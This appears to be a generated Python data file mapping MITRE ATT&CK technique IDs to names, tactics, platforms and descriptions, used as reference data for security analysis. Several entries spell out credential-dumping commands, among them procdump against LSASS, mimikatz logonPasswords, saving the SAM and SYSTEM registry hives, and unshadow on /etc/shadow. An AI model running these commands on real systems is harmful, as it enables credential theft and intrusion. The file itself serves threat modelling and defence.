# This file is generated using generate_attack_map.py script
# DO NOT EDIT! Re-run the script instead...

attack_map = {
 'T1001': {'attack_id': 'T1001',
           'categories': ['command-and-control'],
           'description': 'Adversaries may obfuscate command and control traffic to make it more difficult to detect. '
                          'Command and control (C2) communications are hidden (but not necessarily encrypted) in an '
                          'attempt to make the content more difficult to discover or decipher and to make the '
                          'communication less conspicuous and hide commands from being seen. This encompasses many '
                          'methods, such as adding junk data to protocol traffic, using steganography, or '
                          'impersonating legitimate protocols. ',
           'name': 'Data Obfuscation',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.001': {'attack_id': 'T1001.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may add junk data to protocols used for command and control to make '
                              'detection more difficult. By adding random or meaningless data to the protocols used '
                              'for command and control, adversaries can prevent trivial methods for decoding, '
                              'deciphering, or otherwise analyzing the traffic. Examples may include '
                              'appending/prepending data with junk characters or writing junk characters between '
                              'significant characters. ',
               'name': 'Junk Data',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.002': {'attack_id': 'T1001.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use steganographic techniques to hide command and control traffic to '
                              'make detection efforts more difficult. Steganographic techniques can be used to hide '
                              'data in digital messages that are transferred between systems. This hidden information '
                              'can be used for command and control of compromised systems. In some cases, the passing '
                              'of files embedded using steganography, such as image or document files, can be used for '
                              'command and control. ',
               'name': 'Steganography',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1001.003': {'attack_id': 'T1001.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may impersonate legitimate protocols or web service traffic to disguise '
                              'command and control activity and thwart analysis efforts. By impersonating legitimate '
                              'protocols or web services, adversaries can make their command and control traffic blend '
                              'in with legitimate network traffic.  \n'
                              '\n'
                              'Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent '
                              'traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to '
                              'make the traffic look like it is related with a trusted entity. ',
               'name': 'Protocol Impersonation',
               'platforms': ['Linux', 'Windows', 'macOS']},
 'T1003': {'attack_id': 'T1003',
           'categories': ['credential-access'],
           'description': 'Adversaries may attempt to dump credentials to obtain account login and credential '
                          'material, normally in the form of a hash or a clear text password, from the operating '
                          'system and software. Credentials can then be used to perform [Lateral '
                          'Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.\n'
                          '\n'
                          'Several of the tools mentioned in associated sub-techniques may be used by both adversaries '
                          'and professional security testers. Additional custom tools likely exist as well.\n',
           'name': 'OS Credential Dumping',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1003.001': {'attack_id': 'T1003.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access credential material stored in the process memory of '
                              'the Local Security Authority Subsystem Service (LSASS). After a user logs on, the '
                              'system generates and stores a variety of credential materials in LSASS process memory. '
                              'These credential materials can be harvested by an administrative user or SYSTEM and '
                              'used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use '
                              'Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n'
                              '\n'
                              'As well as in-memory techniques, the LSASS process memory can be dumped from the target '
                              'host and analyzed on a local system.\n'
                              '\n'
                              'For example, on the target host use procdump:\n'
                              '\n'
                              '* <code>procdump -ma lsass.exe lsass_dump</code>\n'
                              '\n'
                              'Locally, mimikatz can be run using:\n'
                              '\n'
                              '* <code>sekurlsa::Minidump lsassdump.dmp</code>\n'
                              '* <code>sekurlsa::logonPasswords</code>\n'
                              '\n'
                              '\n'
                              'Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system '
                              'start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext '
                              "passwords that are stored in Windows, such as any logged-on user's Domain password or "
                              'smart card PINs. The SSP configuration is stored in two Registry keys: '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security '
                              'Packages</code>. An adversary may modify these Registry keys to add new SSPs, which '
                              'will be loaded the next time the system boots, or when the AddSecurityPackage Windows '
                              'API function is called.(Citation: Graeber 2014)\n'
                              '\n'
                              'The following SSPs can be used to access credentials:\n'
                              '\n'
                              '* Msv: Interactive logons, batch logons, and service logons are done through the MSV '
                              'authentication package.\n'
                              '* Wdigest: The Digest Authentication protocol is designed for use with Hypertext '
                              'Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) '
                              'exchanges.(Citation: TechNet Blogs Credential Protection)\n'
                              '* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 '
                              'and later.\n'
                              '* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop '
                              'Services.(Citation: TechNet Blogs Credential Protection)\n',
               'name': 'LSASS Memory',
               'platforms': ['Windows']},
 'T1003.002': {'attack_id': 'T1003.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to extract credential material from the Security Account '
                              'Manager (SAM) database either through in-memory techniques or through the Windows '
                              'Registry where the SAM database is stored. The SAM is a database file that contains '
                              'local accounts for the host, typically those found with the <code>net user</code> '
                              'command. Enumerating the SAM database requires SYSTEM level access.\n'
                              '\n'
                              'A number of tools can be used to retrieve the SAM file through in-memory techniques:\n'
                              '\n'
                              '* pwdumpx.exe\n'
                              '* [gsecdump](https://attack.mitre.org/software/S0008)\n'
                              '* [Mimikatz](https://attack.mitre.org/software/S0002)\n'
                              '* secretsdump.py\n'
                              '\n'
                              'Alternatively, the SAM can be extracted from the Registry with Reg:\n'
                              '\n'
                              '* <code>reg save HKLM\\sam sam</code>\n'
                              '* <code>reg save HKLM\\system system</code>\n'
                              '\n'
                              'Creddump7 can then be used to process the SAM database locally to retrieve '
                              'hashes.(Citation: GitHub Creddump7)\n'
                              '\n'
                              'Notes: \n'
                              '* RID 500 account is the local, built-in administrator.\n'
                              '* RID 501 is the guest account.\n'
                              '* User accounts start with a RID of 1,000+.\n',
               'name': 'Security Account Manager',
               'platforms': ['Windows']},
 'T1003.003': {'attack_id': 'T1003.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access or create a copy of the Active Directory domain '
                              'database in order to steal credential information, as well as obtain other information '
                              'about domain members such as devices, users, and access rights. By default, the NTDS '
                              'file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain '
                              'controller.(Citation: Wikipedia Active Directory)\n'
                              '\n'
                              'In addition to looking NTDS files on active Domain Controllers, attackers may search '
                              'for backups that contain the same or similar information.(Citation: Metcalf 2015)\n'
                              '\n'
                              'The following tools and techniques can be used to enumerate the NTDS file and the '
                              'contents of the entire Active Directory hashes.\n'
                              '\n'
                              '* Volume Shadow Copy\n'
                              '* secretsdump.py\n'
                              '* Using the in-built Windows tool, ntdsutil.exe\n'
                              '* Invoke-NinjaCopy\n',
               'name': 'NTDS',
               'platforms': ['Windows']},
 'T1003.004': {'attack_id': 'T1003.004',
               'categories': ['credential-access'],
               'description': 'Adversaries with SYSTEM access to a host may attempt to access Local Security Authority '
                              '(LSA) secrets, which can contain a variety of different credential materials, such as '
                              'credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft '
                              'AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in '
                              'the registry at <code>HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets</code>. LSA secrets '
                              'can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\n'
                              '\n'
                              '[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the '
                              'Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract '
                              'secrets from memory.(Citation: ired Dumping LSA Secrets)',
               'name': 'LSA Secrets',
               'platforms': ['Windows']},
 'T1003.005': {'attack_id': 'T1003.005',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access cached domain credentials used to allow '
                              'authentication to occur in the event a domain controller is unavailable.(Citation: '
                              'Microsoft - Cached Creds)\n'
                              '\n'
                              'On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version '
                              '2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of '
                              'default cached credentials varies and can be altered per system. This hash does not '
                              'allow pass-the-hash style attacks, and instead requires [Password '
                              'Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext '
                              'password.(Citation: ired mscache)\n'
                              '\n'
                              'With SYSTEM access, the tools/utilities such as '
                              '[Mimikatz](https://attack.mitre.org/software/S0002), '
                              '[Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to '
                              'extract the cached credentials.\n'
                              '\n'
                              'Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib '
                              'mscache)',
               'name': 'Cached Domain Credentials',
               'platforms': ['Windows']},
 'T1003.006': {'attack_id': 'T1003.006',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access credentials and other sensitive information by '
                              "abusing a Windows Domain Controller's application programming interface (API)(Citation: "
                              'Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) '
                              '(Citation: Wine API samlib.dll) to simulate the replication process from a remote '
                              'domain controller using a technique called DCSync.\n'
                              '\n'
                              'Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer '
                              'accounts on the domain controller are able to run DCSync to pull password '
                              'data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include '
                              'current and historical hashes of potentially useful accounts such as KRBTGT and '
                              'Administrators. The hashes can then in turn be used to create a [Golden '
                              'Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the '
                              'Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and '
                              "DCSync) or change an account's password as noted in [Account "
                              'Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat '
                              'ChangeNTLM July 2017)\n'
                              '\n'
                              'DCSync functionality has been included in the "lsadump" module in '
                              '[Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump '
                              'Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication '
                              'protocol.(Citation: Microsoft NRPC Dec 2017)',
               'name': 'DCSync',
               'platforms': ['Windows']},
 'T1003.007': {'attack_id': 'T1003.007',
               'categories': ['credential-access'],
               'description': 'Adversaries may gather credentials from information stored in the Proc filesystem or '
                              '<code>/proc</code>. The Proc filesystem on Linux contains a great deal of information '
                              'regarding the state of the running operating system. Processes running with root '
                              'privileges can use this facility to scrape live memory of other running programs. If '
                              'any of these programs store passwords in clear text or password hashes in memory, these '
                              'values can then be harvested for either usage or brute force attacks, respectively.\n'
                              '\n'
                              'This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub '
                              'May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, '
                              'then harvests passwords and hashes by looking for text strings and regex patterns for '
                              'how given applications such as Gnome Keyring, sshd, and Apache use memory to store such '
                              'authentication artifacts.',
               'name': 'Proc Filesystem',
               'platforms': ['Linux']},
 'T1003.008': {'attack_id': 'T1003.008',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and '
                              '<code>/etc/shadow</code> to enable offline password cracking. Most modern Linux '
                              'operating systems use a combination of <code>/etc/passwd</code> and '
                              '<code>/etc/shadow</code> to store user account information including password hashes in '
                              '<code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the '
                              'root user.(Citation: Linux Password and Shadow File Formats)\n'
                              '\n'
                              'The Linux utility, unshadow, can be used to combine the two files in a format suited '
                              'for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the '
                              'Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > '
                              '/tmp/crack.password.db</code>\n',
               'name': '/etc/passwd and /etc/shadow',
               'platforms': ['Linux']},
 'T1005': {'attack_id': 'T1005',
           'categories': ['collection'],
           'description': 'Adversaries may search local system sources, such as file systems or local databases, to '
                          'find files of interest and sensitive data prior to Exfiltration.\n'
                          '\n'
                          'Adversaries may do this using a [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059), such as '
                          '[cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with '
                          'the file system to gather information. Some adversaries may also use [Automated '
                          'Collection](https://attack.mitre.org/techniques/T1119) on the local system.\n',
           'name': 'Data from Local System',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1006': {'attack_id': 'T1006',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may directly access a volume to bypass file access controls and file system '
                          'monitoring. Windows allows programs to have direct access to logical volumes. Programs with '
                          'direct access may read and write files directly from the drive by analyzing file system '
                          'data structures. This technique bypasses Windows file access controls as well as file '
                          'system monitoring tools. (Citation: Hakobyan 2009)\n'
                          '\n'
                          'Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: '
                          'Github PowerSploit Ninjacopy)',
           'name': 'Direct Volume Access',
           'platforms': ['Windows']},
 'T1007': {'attack_id': 'T1007',
           'categories': ['discovery'],
           'description': 'Adversaries may try to get information about registered services. Commands that may obtain '
                          'information about services using operating system utilities are "sc," "tasklist /svc" using '
                          '[Tasklist](https://attack.mitre.org/software/S0057), and "net start" using '
                          '[Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as '
                          'well. Adversaries may use the information from [System Service '
                          'Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.',
           'name': 'System Service Discovery',
           'platforms': ['Windows']},
 'T1008': {'attack_id': 'T1008',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use fallback or alternate communication channels if the primary channel is '
                          'compromised or inaccessible in order to maintain reliable command and control and to avoid '
                          'data transfer thresholds.',
           'name': 'Fallback Channels',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1010': {'attack_id': 'T1010',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of open application windows. Window listings could '
                          'convey information about how the system is used or give context to information collected by '
                          'a keylogger.',
           'name': 'Application Window Discovery',
           'platforms': ['macOS', 'Windows']},
 'T1011': {'attack_id': 'T1011',
           'categories': ['exfiltration'],
           'description': 'Adversaries may attempt to exfiltrate data over a different network medium than the command '
                          'and control channel. If the command and control network is a wired Internet connection, the '
                          'exfiltration may occur, for example, over a WiFi connection, modem, cellular data '
                          'connection, Bluetooth, or another radio frequency (RF) channel.\n'
                          '\n'
                          'Adversaries may choose to do this if they have sufficient access or proximity, and the '
                          'connection might not be secured or defended as well as the primary Internet-connected '
                          'channel because it is not routed through the same enterprise network',
           'name': 'Exfiltration Over Other Network Medium',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1011.001': {'attack_id': 'T1011.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and '
                              'control channel. If the command and control network is a wired Internet connection, an '
                              'attacker may opt to exfiltrate data using a Bluetooth communication channel.\n'
                              '\n'
                              'Adversaries may choose to do this if they have sufficient access and proximity. '
                              'Bluetooth connections might not be secured or defended as well as the primary '
                              'Internet-connected channel because it is not routed through the same enterprise '
                              'network.',
               'name': 'Exfiltration Over Bluetooth',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1012': {'attack_id': 'T1012',
           'categories': ['discovery'],
           'description': 'Adversaries may interact with the Windows Registry to gather information about the system, '
                          'configuration, and installed software.\n'
                          '\n'
                          'The Registry contains a significant amount of information about the operating system, '
                          'configuration, software, and security.(Citation: Wikipedia Windows Registry) Information '
                          'can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, '
                          'though other means to access the Registry exist. Some of the information may help '
                          'adversaries to further their operation within a network. Adversaries may use the '
                          'information from [Query Registry](https://attack.mitre.org/techniques/T1012) during '
                          'automated discovery to shape follow-on behaviors, including whether or not the adversary '
                          'fully infects the target and/or attempts specific actions.',
           'name': 'Query Registry',
           'platforms': ['Windows']},
 'T1014': {'attack_id': 'T1014',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use rootkits to hide the presence of programs, files, network connections, '
                          'services, drivers, and other system components. Rootkits are programs that hide the '
                          'existence of malware by intercepting/hooking and modifying operating system API calls that '
                          'supply system information. (Citation: Symantec Windows Rootkits) \n'
                          '\n'
                          'Rootkits or rootkit enabling functionality may reside at the user or kernel level in the '
                          'operating system or lower, to include a hypervisor, Master Boot Record, or [System '
                          'Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) '
                          'Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike '
                          'Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)',
           'name': 'Rootkit',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1016': {'attack_id': 'T1016',
           'categories': ['discovery'],
           'description': 'Adversaries may look for details about the network configuration and settings of systems '
                          'they access or through information discovery of remote systems. Several operating system '
                          'administration utilities exist that can be used to gather this information. Examples '
                          'include [Arp](https://attack.mitre.org/software/S0099), '
                          '[ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), '
                          '[nbtstat](https://attack.mitre.org/software/S0102), and '
                          '[route](https://attack.mitre.org/software/S0103).\n'
                          '\n'
                          'Adversaries may use the information from [System Network Configuration '
                          'Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.',
           'name': 'System Network Configuration Discovery',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1018': {'attack_id': 'T1018',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of other systems by IP address, hostname, or other '
                          'logical identifier on a network that may be used for Lateral Movement from the current '
                          'system. Functionality could exist within remote access tools to enable this, but utilities '
                          'available on the operating system could also be used such as  '
                          '[Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using '
                          '[Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files '
                          '(ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) in '
                          'order to discover the hostname to IP address mappings of remote systems. \n'
                          '\n'
                          'Specific to macOS, the <code>bonjour</code> protocol exists to discover additional '
                          'Mac-based systems within the same broadcast domain.',
           'name': 'Remote System Discovery',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1020': {'attack_id': 'T1020',
           'categories': ['exfiltration'],
           'description': 'Adversaries may exfiltrate data, such as sensitive documents, through the use of automated '
                          'processing after being gathered during Collection. \n'
                          '\n'
                          'When automated exfiltration is used, other exfiltration techniques likely apply as well to '
                          'transfer the information out of the network, such as [Exfiltration Over C2 '
                          'Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative '
                          'Protocol](https://attack.mitre.org/techniques/T1048).',
           'name': 'Automated Exfiltration',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1020.001': {'attack_id': 'T1020.001',
               'categories': ['exfiltration'],
               'description': 'Adversaries may leverage traffic mirroring in order to automate data exfiltration over '
                              'compromised network infrastructure.  Traffic mirroring is a native feature for some '
                              'network devices and used for network analysis and may be configured to duplicate '
                              'traffic and forward to one or more destinations for analysis by a network analyzer or '
                              'other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic '
                              'Mirroring)\n'
                              '\n'
                              'Adversaries may abuse traffic mirroring to mirror or redirect network traffic through '
                              'other network infrastructure they control. Malicious modifications to network devices '
                              'to enable traffic redirection may be possible through '
                              '[ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System '
                              'Image](https://attack.mitre.org/techniques/T1601/001).(Citation: '
                              'US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use '
                              'traffic duplication in conjunction with [Network '
                              'Sniffing](https://attack.mitre.org/techniques/T1040), [Input '
                              'Capture](https://attack.mitre.org/techniques/T1056), or '
                              '[Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals '
                              'and objectives of the adversary.',
               'name': 'Traffic Duplication',
               'platforms': ['Network']},
 'T1021': {'attack_id': 'T1021',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into '
                          'a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. '
                          'The adversary may then perform actions as the logged-on user.\n'
                          '\n'
                          'In an enterprise environment, servers and workstations can be organized into domains. '
                          'Domains provide centralized identity management, allowing users to login using one set of '
                          'credentials across the entire network. If an adversary is able to obtain a set of valid '
                          'domain credentials, they could login to many different machines using remote access '
                          'protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure '
                          'Shell)(Citation: TechNet Remote Desktop Services)',
           'name': 'Remote Services',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1021.001': {'attack_id': 'T1021.001',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log '
                              'into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform '
                              'actions as the logged-on user.\n'
                              '\n'
                              'Remote desktop is a common feature in operating systems. It allows a user to log into '
                              'an interactive session with a system desktop graphical user interface on a remote '
                              'system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as '
                              'Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n'
                              '\n'
                              'Adversaries may connect to a remote system over RDP/RDS to expand access if the service '
                              'is enabled and allows access to accounts with known credentials. Adversaries will '
                              'likely use Credential Access techniques to acquire credentials to use with RDP. '
                              'Adversaries may also use RDP in conjunction with the [Accessibility '
                              'Features](https://attack.mitre.org/techniques/T1546/008) technique for '
                              'Persistence.(Citation: Alperovitch Malware)',
               'name': 'Remote Desktop Protocol',
               'platforms': ['Windows']},
 'T1021.002': {'attack_id': 'T1021.002',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with a remote network share using Server Message Block (SMB). The adversary '
                              'may then perform actions as the logged-on user.\n'
                              '\n'
                              'SMB is a file, printer, and serial port sharing protocol for Windows machines on the '
                              'same network or domain. Adversaries may use SMB to interact with file shares, allowing '
                              'them to move laterally throughout a network. Linux and macOS implementations of SMB '
                              'typically use Samba.\n'
                              '\n'
                              'Windows systems have hidden network shares that are accessible only to administrators '
                              'and provide the ability for remote file copy and other administrative functions. '
                              'Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this '
                              'technique in conjunction with administrator-level [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked '
                              'system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems '
                              'using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run '
                              'transferred binaries through remote Execution. Example execution techniques that rely '
                              'on authenticated sessions over SMB/RPC are [Scheduled '
                              'Task/Job](https://attack.mitre.org/techniques/T1053), [Service '
                              'Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management '
                              'Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use '
                              'NTLM hashes to access administrator shares on systems with [Pass the '
                              'Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and '
                              'patch levels.(Citation: Microsoft Admin Shares)',
               'name': 'SMB/Windows Admin Shares',
               'platforms': ['Windows']},
 'T1021.003': {'attack_id': 'T1021.003',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with remote machines by taking advantage of Distributed Component Object Model '
                              '(DCOM). The adversary may then perform actions as the logged-on user.\n'
                              '\n'
                              'The Windows Component Object Model (COM) is a component of the native Windows '
                              'application programming interface (API) that enables interaction between software '
                              'objects, or executable code that implements one or more interfaces. Through COM, a '
                              'client object can call methods of server objects, which are typically Dynamic Link '
                              'Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware '
                              'that extends the functionality of COM beyond a local computer using remote procedure '
                              'call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft '
                              'COM)\n'
                              '\n'
                              'Permissions to interact with local and remote server COM objects are specified by '
                              'access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) '
                              'By default, only Administrators may remotely activate and launch COM objects through '
                              'DCOM.(Citation: Microsoft COM ACL)\n'
                              '\n'
                              'Through DCOM, adversaries operating in the context of an appropriately privileged user '
                              'can remotely obtain arbitrary and even direct shellcode execution through Office '
                              'applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other '
                              'Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan '
                              '2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in '
                              'existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic '
                              'Data Exchange (DDE) execution directly through a COM created instance of a Microsoft '
                              'Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing '
                              'the need for a malicious document.',
               'name': 'Distributed Component Object Model',
               'platforms': ['Windows']},
 'T1021.004': {'attack_id': 'T1021.004',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log '
                              'into remote machines using Secure Shell (SSH). The adversary may then perform actions '
                              'as the logged-on user.\n'
                              '\n'
                              'SSH is a protocol that allows authorized users to open remote shells on other '
                              'computers. Many Linux and macOS versions come with SSH installed by default, although '
                              'typically disabled until the user enables it. The SSH server can be configured to use '
                              'standard password authentication or public-private keypairs in lieu of or in addition '
                              'to a password. In this authentication scenario, the user’s public key must be in a '
                              'special file on the computer running the server that lists which keypairs are allowed '
                              'to login as that user.(Citation: SSH Secure Shell)',
               'name': 'SSH',
               'platforms': ['Linux', 'macOS']},
 'T1021.005': {'attack_id': 'T1021.005',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'remotely control machines using Virtual Network Computing (VNC). The adversary may then '
                              'perform actions as the logged-on user.\n'
                              '\n'
                              'VNC is a desktop sharing system that allows users to remotely control another '
                              'computer’s display by relaying mouse and keyboard inputs over the network. VNC does not '
                              'necessarily use standard user credentials. Instead, a VNC client and server may be '
                              'configured with sets of credentials that are used only for VNC connections.',
               'name': 'VNC',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1021.006': {'attack_id': 'T1021.006',
               'categories': ['lateral-movement'],
               'description': 'Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to '
                              'interact with remote systems using Windows Remote Management (WinRM). The adversary may '
                              'then perform actions as the logged-on user.\n'
                              '\n'
                              'WinRM is the name of both a Windows service and a protocol that allows a user to '
                              'interact with a remote system (e.g., run an executable, modify the Registry, modify '
                              'services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by '
                              'any number of programs such as PowerShell.(Citation: Jacobsen 2014)',
               'name': 'Windows Remote Management',
               'platforms': ['Windows']},
 'T1025': {'attack_id': 'T1025',
           'categories': ['collection'],
           'description': 'Adversaries may search connected removable media on computers they have compromised to find '
                          'files of interest. Sensitive data can be collected from any removable media (optical disk '
                          'drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. '
                          'Interactive command shells may be in use, and common functionality within '
                          '[cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n'
                          '\n'
                          'Some adversaries may also use [Automated '
                          'Collection](https://attack.mitre.org/techniques/T1119) on removable media.',
           'name': 'Data from Removable Media',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1026': {'attack_id': 'T1026',
           'categories': ['command-and-control'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'Some adversaries may split communications between different protocols. There could be one '
                          'protocol for inbound command and control and another for outbound data, allowing it to '
                          'bypass certain firewall restrictions. The split could also be random to simply avoid data '
                          'threshold alerts on any one communication.',
           'name': 'Multiband Communication',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027': {'attack_id': 'T1027',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may attempt to make an executable or file difficult to discover or analyze by '
                          'encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. '
                          'This is common behavior that can be used across different platforms and the network to '
                          'evade defenses. \n'
                          '\n'
                          'Payloads may be compressed, archived, or encrypted in order to avoid detection. These '
                          'payloads may be used during Initial Access or later to mitigate detection. Sometimes a '
                          "user's action may be required to open and [Deobfuscate/Decode Files or "
                          'Information](https://attack.mitre.org/techniques/T1140) for [User '
                          'Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to '
                          'input a password to open a password protected compressed/encrypted file that was provided '
                          'by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used '
                          'compressed or archived scripts, such as JavaScript. \n'
                          '\n'
                          'Portions of files can also be encoded to hide the plain-text strings that would otherwise '
                          'help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) '
                          'Payloads may also be split into separate, seemingly benign files that only reveal malicious '
                          'functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n'
                          '\n'
                          'Adversaries may also obfuscate commands executed from payloads or directly via a [Command '
                          'and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment '
                          'variables, aliases, characters, and other platform/language specific semantics can be used '
                          'to evade signature based detections and application control mechanisms. (Citation: FireEye '
                          'Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto '
                          'EncodedCommand March 2017) ',
           'name': 'Obfuscated Files or Information',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1027.001': {'attack_id': 'T1027.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use binary padding to add junk data and change the on-disk '
